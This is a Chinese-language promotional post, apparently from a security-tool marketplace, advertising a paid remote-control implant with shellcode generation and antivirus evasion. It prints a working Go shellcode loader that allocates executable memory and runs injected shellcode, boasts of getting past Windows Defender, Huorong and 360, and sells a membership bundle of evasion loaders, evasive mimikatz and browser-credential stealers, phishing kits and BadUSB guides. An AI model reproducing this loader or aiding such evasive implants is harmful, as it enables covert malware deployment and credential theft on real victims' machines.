请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。如有侵权烦请告知,我们会立即删除并致歉。谢谢!
增加shellcode生成功能,主要更改server和前端代码,支持c,python,go,rust等主流语言格式
修复client支持Windows 7 和 Windows 8 的支持,使用go1.20.12编译
清理server 针对socks5的调试信息和client process的debug信息,更加灵活的免杀!
2025.9.7
优化agent断开链接后,server监听的socks5端口还在占用,自动关闭监听
2025.9.3
修复前端socks5 ip显示优化
优化激活提示词,显示有效时间
shellcode生成
生成的bin文件只有2KB
windows defender
某绒
某安全卫士
使用加载器加载shellcode文件上线
成功上线
使用go语言格式的加载器编写代码,编译运行上线
编写代码
package mainimport ("syscall""unsafe")funcmain() {kernel32 := syscall.NewLazyDLL("kernel32.dll")VirtualAlloc := kernel32.NewProc("VirtualAlloc")RtlMoveMemory := kernel32.NewProc("RtlMoveMemory")shellcode := []byte{0x56, 0x48...}addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), 0x1000|0x2000, 0x40)RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))syscall.SyscallN(addr)}
编译运行 默认的shellcode就是免杀的, 成功上线
默认的shellcode就是免杀的, 成功上线
加入帮会,获取内测体验
👇 帮会早鸟价 👇
199元 / 年卡会员
299元 / 永久会员
后面工具越多,帮会价格越高
早加入早享受
加入后可获以下服务:
1. 帮会所有工具的永久使用权,工具包含:
(1)目前已有的所有工具:
Dshell内测工具
shellcode图形化转换工具
windows defender 免杀加载器
Rust免杀创建线程loader源码
Rust免杀编译环境虚拟机
360免杀版分离加载1.2
vshell免杀加载器
绕过360传输告警
CheckGoBuild(win&linux版本)
fscan2.0.0(各种免杀版本)
packerwdfV1.0.1
packer360V1.1.2
红队快速部署各种网页钓鱼工具(可内网)
go语言实现反射加载dll
packerhuorongV2.0.0
捆绑器源码学习
CS插件一键免杀v2.0--免杀360
CS插件一键免杀v1.0--免杀火绒6.0
badusb制作教程
去exe黑框工具
cslove-自研CS插件
360安全卫士开启晶核+qvm202+鲲鹏引擎专项
bypassQVM工具
360免杀马生成器
火绒免杀马生成器
defender免杀马生成器
mimikatz免杀版, 实战可过亚信
HackBrowserData免杀版
内网多级代理Venom毒液免杀版
内网多级代理Stowaway免杀版
CheckGoBuild.exe fuzz go编译参数工具
白加黑武器化工具GenDLLFile.exe
x步云沙箱环境信息获取工具
FileEntropyAnalyzer一款查看文件熵值的工具
大白哥版二开cs等
会持续一直更新免杀
**部分非免杀工具或后续陆续上传。
(2)后续的新工具(特别是图形化免杀工具),都会在帮会同步。
2. 后续所有工具的迭代更新版本将在帮会中发布;
3. 售后服务 + 持续更新 + 优先支持。
由于安卓支持小程序购买,苹果暂不支持
因此下面将区分两者的购买渠道
安卓用户小程序购买更方便
👇 点击图片跳转进入小程序 👇
👇 苹果/安卓用户都可扫码购买 👇
咨询请加好友
更多网安工具
来FreeBuf首页《工具市集》
或者点击图片进入FreeBuf小程序👇
◀ FreeBuf知识大陆APP ▶
苹果用户至App Store下载
安卓用户各大应用商城均可下载
如有问题请联系vivi微信:Erfubreef121
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...